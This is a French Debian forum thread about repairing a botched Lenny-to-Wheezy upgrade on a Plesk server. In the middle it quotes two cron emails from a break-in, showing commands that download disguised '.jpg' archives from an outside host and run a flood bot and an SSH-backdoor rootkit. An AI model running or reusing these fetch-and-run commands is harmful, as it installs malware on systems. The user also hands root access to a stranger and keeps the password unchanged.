Je n’avais pas vue ton post =
[quote]de266:~# apt-get -s remove libc-bin
Reading package lists… Done
Building dependency tree
Reading state information… Done
You might want to run `apt-get -f install’ to correct these:
The following packages have unmet dependencies:
nscd: Depends: libc6 (> 2.13) but 2.7-18lenny7 is to be installed
E: Unmet dependencies. Try ‘apt-get -f install’ with no packages (or specify a solution).[/quote]
[quote=“BelZéButh”]Comme dit (MP) tu aurais dû préciser le fait que :
Tu as tenter de passer de Lenny à Squeeze puis Wheezy, ceci malgré les échecs cuisants durant ces phases, pour enfin revenir/tenter sur Lenny.[/quote]
Dans ce cas il va falloir avant toutes choses revenir à une Lenny pure, faire une sauvegarde complète, passer en Squeeze, puis en Wheezy (la sauvegarde s’assurant de ne rien perdre lors de mises-à-jour suivantes).
Et tout ça dans l’ordre.
Pour la première étape, crée un fichier /etc/apt/preferences avec le contenu suivant :
Package: *
Pin: release n=lenny
Pin-Priority: 1001
Puis lance une simulation pour vérifier que tout va bien se passer :
Enfin, lance le retour en Lenny :
Une fois ce problème réglé, tu auras repris le contrôle d’APT, et ce sera le moment de faire une sauvegarde de ton système avant de tenter de nouveau la mise-à-jour Lenny > Squeeze > Wheezy.
Je viens de créer le fichier dont tu me parles et j’ai fais un test en simulation j’ai pas un bon résultat :
[quote]de266:/# apt-get -s dist-upgrade
Reading package lists… Done
Building dependency tree
Reading state information… Done
You might want to run `apt-get -f install’ to correct these.
The following packages have unmet dependencies:
libc-bin: Breaks: libc6 (< 2.10) but 2.7-18lenny7 is installed
nscd: Depends: libc6 (> 2.13) but 2.7-18lenny7 is installed
E: Unmet dependencies. Try using -f.[/quote]
J’étais partant pour ta solution vv222, mais …
[quote=“AntoninC”]de266:~# uname -a && lsb_release -a
Linux de266.ispfr.net 2.6.18-028stab107.2 #1 SMP Mon Jul 1 21:48:35 MSD 2013 i686 GNU/Linux
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 6.0.8 (n/a)
Release: 6.0.8
Codename: n/a[/quote]
AntoninC, je tente un truc sur ton serveur (sources.list en Squeeze/Wheezy) en mode simulation !
Ok merci 
si seulement tout pouvait fonctionner.
de266:~# apt-get -t stable -s install libc6
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
glibc-doc locales
Recommended packages:
libc6-i686
The following packages will be upgraded:
libc6
1 upgraded, 0 newly installed, 0 to remove and 441 not upgraded.
2 not fully installed or removed.
Inst libc6 [2.7-18lenny7] (2.13-38 Debian:7.2/stable)
Conf libc6 (2.13-38 Debian:7.2/stable)
Conf clamav-base (0.97.8+dfsg-1 Debian:7.2/stable)
Conf nscd (2.13-38 Debian:7.2/stable)
de266:~#
de266:~# apt-get -t stable -s install libc6 libc6-i686
Reading package lists... Done
Building dependency tree
Reading state information... Done
Suggested packages:
glibc-doc locales
The following NEW packages will be installed:
libc6-i686
The following packages will be upgraded:
libc6
1 upgraded, 1 newly installed, 0 to remove and 441 not upgraded.
2 not fully installed or removed.
Inst libc6 [2.7-18lenny7] (2.13-38 Debian:7.2/stable)
Conf libc6 (2.13-38 Debian:7.2/stable)
Inst libc6-i686 (2.13-38 Debian:7.2/stable)
Conf clamav-base (0.97.8+dfsg-1 Debian:7.2/stable)
Conf nscd (2.13-38 Debian:7.2/stable)
Conf libc6-i686 (2.13-38 Debian:7.2/stable)
de266:~#
N’a pas l’air vilain …
WOW aussi rapidement mdr je suis impressionné et super content, mais quand même un sentiment de… c’est pas moi qui ai réussi a le faire. Tu lances la MAJ ? Mon serveur à normalement un débit extrêmement rapide. Vraiment merci !
Sincèrement, je préférerai rester sur mon idée première.
À savoir, une sauvegarde (rsync) que je chroot en local et de là, passer à l’upgrade (une simulation réelle depuis mon disque externe, qui permettra de résoudre d’éventuel problème) et seulement après la mise à jour de ton serveur.
Et pour cause …
de266:~# apt-get -s install rsync
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run `apt-get -f install' to correct these:
The following packages have unmet dependencies:
libc-bin: Breaks: libc6 (< 2.10) but 2.7-18lenny7 is to be installed
nscd: Depends: libc6 (> 2.13) but 2.7-18lenny7 is to be installed
rsync: Depends: libacl1 (>= 2.2.51-8) but 2.2.47-2 is to be installed
Depends: libc6 (>= 2.8) but 2.7-18lenny7 is to be installed
E: Unmet dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
de266:~#
de266:~#ps : il me faut ajuster le fichier preferences, entre autre …
Sincèrement, je préférerai rester sur mon idée première.
À savoir, une sauvegarde (rsync) que je chroot en local et de là, passer à l’upgrade (une simulation réelle depuis mon disque externe, qui permettra de résoudre d’éventuel problème) et seulement après la mise à jour de ton serveur.
ps : il me faut ajuster le fichier preferences, entre autre …[/quote]
Pour le moment je suis incapable de le faire. Je ne sais pas COMMENT le faire, alors si effectivement tu encore du temps à me consacrer je trouve aussi que c’est une solution plutôt sage que de faire un test en local et je serais ravi si tu pouvais le faire.
Voici ce que je te propose, pour ce soir cela fait short, autant reprendre cela demain, à tête reposer.
D’autre part, j’ai trois machines (fonctionnelles) en 32 bits mais il me faudrait ajuster l’une d’entre elle pour une compatibilité en amd64.
Ayant une quatrième bécane en 64, j’aurai très certainement plus vite fait d’y installer une Wheezy pour ce faire.
Tu peux envisager de changer ton mdp (root) ce soir, si tu le souhaites et je te recontacterai dès demain, lorsque que je serai opérationnel.
ps: dans l’état actuel, je crois que tu n’es plus à quelques heures près …
PARFAIT. Je ne vais pas changer le mdp il est suffisamment compliqué comme cela et j’ai confiance en toi.
Tu as totalement raison lorsque tu dis que nous ne sommes plus à une heure près, de toute manière tous mes sites fonctionnent parfaitement à l’heure actuelle.
J’attends que tu me recontactes demain.
Encore merci pour tous ces efforts. Excellente nuit et à demain.
GRrrrr … 
Un souci se pose, là !
[quote=“BelZéButh”] une sauvegarde (rsync) que je chroot en local …
Et pour cause …
de266:~# apt-get -s install rsync
Reading package lists... Done
Building dependency tree
Reading state information... Done
You might want to run `apt-get -f install' to correct these:
The following packages have unmet dependencies:
libc-bin: Breaks: libc6 (< 2.10) but 2.7-18lenny7 is to be installed
nscd: Depends: libc6 (> 2.13) but 2.7-18lenny7 is to be installed
rsync: Depends: libacl1 (>= 2.2.51-8) but 2.2.47-2 is to be installed
Depends: libc6 (>= 2.8) but 2.7-18lenny7 is to be installed
E: Unmet dependencies. Try 'apt-get -f install' with no packages (or specify a solution).
de266:~#
de266:~#
----------[/quote]
La nuit porte conseil(s) … 
À demain ! 
* edit *
Je n’ai rien dit !
de266:~# apt-cache policy rsync
rsync:
Installed: 3.0.3-2
Candidate: 3.0.9-4
Version table:
3.0.9-4 0
500 http://ftp.fr.debian.org stable/main Packages
3.0.7-2 0
500 http://ftp.fr.debian.org oldstable/main Packages
*** 3.0.3-2 0
100 /var/lib/dpkg/status
de266:~#
de266:~#
* edit_1 *
As-tu des explications à ceci ?
de266:~#
de266:~# fdisk -l
cannot open /proc/partitions
de266:~#
de266:~# mount
/dev/vzfs on / type vzfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime)
tmpfs on /opt/psa/handlers/before-local type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/before-queue type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/before-remote type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/info type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/spool type tmpfs (rw,relatime)
de266:~#
de266:~# blkid
de266:~#
de266:~# cat /etc/fstab
proc /proc proc defaults 0 0
none /dev/pts devpts rw 0 0
de266:~#
de266:~# cat /etc/mtab
/dev/vzfs / vzfs rw,relatime 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,relatime 0 0
tmpfs /lib/init/rw tmpfs rw,nosuid,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime 0 0
tmpfs /opt/psa/handlers/before-local tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/before-queue tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/before-remote tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/info tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/spool tmpfs rw,relatime 0 0
de266:~#
Je ne comprends pas le code que tu m’affiches et s’il y a un problème.
J’aurai certainement dû préciser qu’un gros c****** m’a piraté la semaine dernière. Grosse frayeur, c’est d’ailleurs à partir de ce moment que j’ai essayer de faire des MAJ surtout du plesk. Donc peut-être que ce que tu m’affiche n’est pas normal et est probablement dû à ce hacker ?
EDIT
A moins que cela est un rapport avec les conseils du site Invision qui dise de désactiver des fonctions dans le php.ini :
Je ne sais pas du tout…
Qu’est-ce qui te fait dire que ton serveur à été hacker ?
Quand tant n’es-tu aperçu ? Comment ?
Une date précise ?
Je n’ai pas encore jeté un œil aux logs. Et en supposant que, un vrai, ne laisse que très peu de trace, voir pas du tout à ce niveau.
Qu’as-tu fait à partir de là ?
Changé tous les mdp ? Mais encore ?
* edit *
Ta configuration de fail2ban est d’une médiocrité, j’en ai froid dans le dos !!
* edit_1 *
Nul trace d’un pare feu, (iptables) me semble t-il …
de266:~# ls /etc/init.d/
README courier-imap hwclockfirst.sh mountall-bootclean.sh mysql-ndb psa-spamassassin screen-cleanup stop-bootlogd-single vzreboot
apache2 cron ifupdown mountall.sh mysql-ndb-mgm quota sendmail stunnel4 x11-common
bind9 dbus ifupdown-clean mountdevsubfs.sh networking quotarpc sendsigs subsonic xinetd
bind9.dpkg-old drwebd keymap.sh mountkernfs.sh nscd rc single sudo
bootlogd fail2ban killprocs mountnfs-bootclean.sh nscd.dpkg-new rc.local skeleton sw-cp-server
bootmisc.sh fetchmail klogd mountnfs.sh openbsd-inetd rcS spamassassin sysklogd
checkfs.sh gdomap libdevmapper1.02 mountoverflowtmp portmap reboot spamassassin.real umountfs
checkroot.sh halt lprng mtab.sh postfix rmnologin spamassassin.real.dpkg-new umountnfs.sh
clamav-freshclam hostname.sh mailman munin-node procps rsync ssh umountroot
console-screen.sh hwclock.sh modutils mysql psa saslauthd stop-bootlogd urandom
de266:~#
Je n’ai même pas configurer fail2ban je ne sais pas faire. J’ai tout improvisé en quelques heures tellement j’étais paniqué.
Je l’ai su en recevant deux mails :
[quote]Cron root@de266 cd /usr/games;wget luminita.altervista.org/m.jpg;tar xzvf m.jpg;cd .m;./start.sh;cd /usr/local/psa/admin/htdocs/enterprise/control/psa;rm -rf engine.php
–21:05:01-- luminita.altervista.org/m.jpg
=> `m.jpg’
Resolving luminita.altervista.org… 144.76.62.22
Connecting to luminita.altervista.org|144.76.62.22|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 440,972 (431K) [image/jpeg]
0K … … … … … 11% 440.25 KB/s
50K … … … … … 23% 1.70 MB/s
100K … … … … … 34% 1.70 MB/s
150K … … … … … 46% 1.69 MB/s
200K … … … … … 58% 1.75 MB/s
250K … … … … … 69% 38.03 MB/s
300K … … … … … 81% 1.71 MB/s
350K … … … … … 92% 1.72 MB/s
400K … … … 100% 43.17 MB/s
21:05:02 (1.47 MB/s) - `m.jpg’ saved [440972/440972]
.m/
.m/tty
.m/z
.m/bang.txt
.m/mech.pid
.m/std
.m/f
.m/c/
.m/c/v.c
.m/c/s.c
.m/c/j2.c
.m/c/f.c
.m/c/j.c
.m/c/tty.c
.m/c/stream.c
.m/x
.m/httpd
.m/1
.m/start.sh
.m/j2
.m/usr
.m/f4
.m/h
.m/mech.help
.m/shiet.txt
.m/j
.m/c4
.m/sl
.m/s
.m/talk
.m/b
.m/v2
.m/b2
.m/mech.set
.m/stream
./start.sh: line 1: /#bin/bash: No such file or directory
Enjoy FloodBot based on OverKill[/quote]
Et un autre mail :
[quote]Cron root@de266 cd /usr/games;wget luminita.altervista.org/phantom.jpg;tar xzvf phantom.jpg;./setup
–20:41:01-- luminita.altervista.org/phantom.jpg
=> `phantom.jpg’
Resolving luminita.altervista.org… 144.76.62.22
Connecting to luminita.altervista.org|144.76.62.22|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 242,354 (237K) [image/jpeg]
0K … … … … … 21% 1.70 MB/s
50K … … … … … 42% 1.65 MB/s
100K … … … … … 63% 1.68 MB/s
150K … … … … … 84% 1.71 MB/s
200K … … … … 100% 69.14 MB/s
20:41:02 (1.98 MB/s) - `phantom.jpg’ saved [242354/242354]
phantom/
phantom/bin/
phantom/bin/ps
phantom/bin/netstat
phantom/bin/pstree
phantom/ssh/
phantom/ssh/cfgz.h
phantom/ssh/keyz.h
phantom/ssh/kswaps
phantom/ssh/sidz.h
phantom/files/
phantom/files/libn
phantom/files/libps
phantom/files/libtr
phantom/scat
setup
[-] Starting…
/usr/bin/chattr: No such file or directory while trying to stat /etc/rc.d/rc.sysinit
[-] Creating directory layout
[-] Installing ssh daemon files
[-] Setting up for boot
sh: /etc/rc.d/rc.sysinit: No such file or directory
[-] Inserting fuck files
[-] Cleaning up
[-] Exiting…[/quote]
J’ai bloqué son adresse Ip installé fail2ban et clamav et j’ai tenté de supprimer les deux fichiers qu’il ou elle a uplaodé.
Bien entendu j’ai changé les mdps.
Je me sens tellement impuissant dans ce genre de situation. C’est sûr que je vais TOUT faire pour apprendre un maximum à configurer correctement Linux et surtout à m’améliorer avec cet OS qui est certainement tout mon avenir professionnel. Même si je viens juste de débuté la formation je me sens déjà à des années lumière de ce que vous savez tous faire ici.
Perso, j’ai appris sur le tas, comme on dit.
ps: j’ai porté quelques modif à fail2ban.
de266:/usr/local/psa/admin/htdocs/enterprise/control# tail -f /var/log/fail2ban.log
2013-10-29 21:58:10,836 fail2ban.jail : INFO Jail 'apache-noscript' started
2013-10-29 21:58:10,837 fail2ban.jail : INFO Jail 'pam-generic' started
2013-10-29 21:58:10,839 fail2ban.jail : INFO Jail 'ssh-ddos' started
2013-10-29 21:58:10,840 fail2ban.jail : INFO Jail 'apache-multiport' started
2013-10-29 21:58:10,844 fail2ban.jail : INFO Jail 'courierauth' started
2013-10-29 21:58:10,845 fail2ban.jail : INFO Jail 'apache-overflows' started
2013-10-29 21:58:10,847 fail2ban.jail : INFO Jail 'ssh' started
2013-10-29 21:58:10,848 fail2ban.jail : INFO Jail 'postfix' started
2013-10-29 21:58:10,849 fail2ban.jail : INFO Jail 'sasl' started
2013-10-29 21:58:10,851 fail2ban.jail : INFO Jail 'apache' started
...
La moindre des choses, quoi …
Bref, en tout état de cause, il te faut très sérieusement envisager une réinstallation, (après sauvegarde) bien que je ne sois pas encore convaincu du hack, mais quand bien même, si tel est le cas, il n’y a guère d’autre remède, fiable et viable.
J’arrête là, pour ce soir …
INFINIMENT merci. Tu es simplement adorable !
Va te coucher maintenant lol il faut que je change mon mdp pour ton bien personnel.
Non sérieusement vraiment encore milles mercis !
Ok, à demain (en MP pour la relance)
ps : Je coupe ma connexion ssh.
Bonjour,
Tu es bien matinal, si je m’attendais à ça.
Alors si j’ai bien compris par étape tu vas mettre en place un chroot en local et ensuite tenté une MAJ toujours en local pour voir ce qui cloche et ce qui ne cloche pas. Ensuite activer le tout directement sur mon serveur ?
– Great –
Salut,
Je suis en train de mettre en place rsync, les fichiers qui vont bien (voir les liens que je t’ai filés > wiki) et une clé ssh pour root.
Ceci terminé, je tenterai d’établir une connexion via rsync.
Si tout se passe bien, je rapatrie une sauvegarde en local que je chrooterai sur un bouzin en amd64, tester/résoudre les conflits de mise à jour.
La suite, on en reparlera plus tard …
Nota: j’ai modifié ton .bashrc à ma convenance, temporairement !
Le souci …
[08:11:55] ~ # fdsik -l
-bash: fdsik: command not found
[08:12:03] ~ #
[08:12:04] ~ # fdisk -l
cannot open /proc/partitions
[08:12:11] ~ #
[08:12:12] ~ # mount
/dev/vzfs on / type vzfs (rw,relatime)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime)
tmpfs on /opt/psa/handlers/before-local type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/before-queue type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/before-remote type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/info type tmpfs (rw,relatime)
tmpfs on /opt/psa/handlers/spool type tmpfs (rw,relatime)
[08:12:16] ~ #
[08:12:16] ~ # cat /etc/fstab
proc /proc proc defaults 0 0
none /dev/pts devpts rw 0 0
[08:12:24] ~ #
[08:12:30] ~ # cat /etc/mtab
/dev/vzfs / vzfs rw,relatime 0 0
proc /proc proc rw,relatime 0 0
sysfs /sys sysfs rw,relatime 0 0
tmpfs /lib/init/rw tmpfs rw,nosuid,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,relatime 0 0
devpts /dev/pts devpts rw,nosuid,noexec,relatime 0 0
tmpfs /opt/psa/handlers/before-local tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/before-queue tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/before-remote tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/info tmpfs rw,relatime 0 0
tmpfs /opt/psa/handlers/spool tmpfs rw,relatime 0 0
[08:12:39] ~ #
ps: vers 5-6 heures en moyenne. Plutôt 5 …
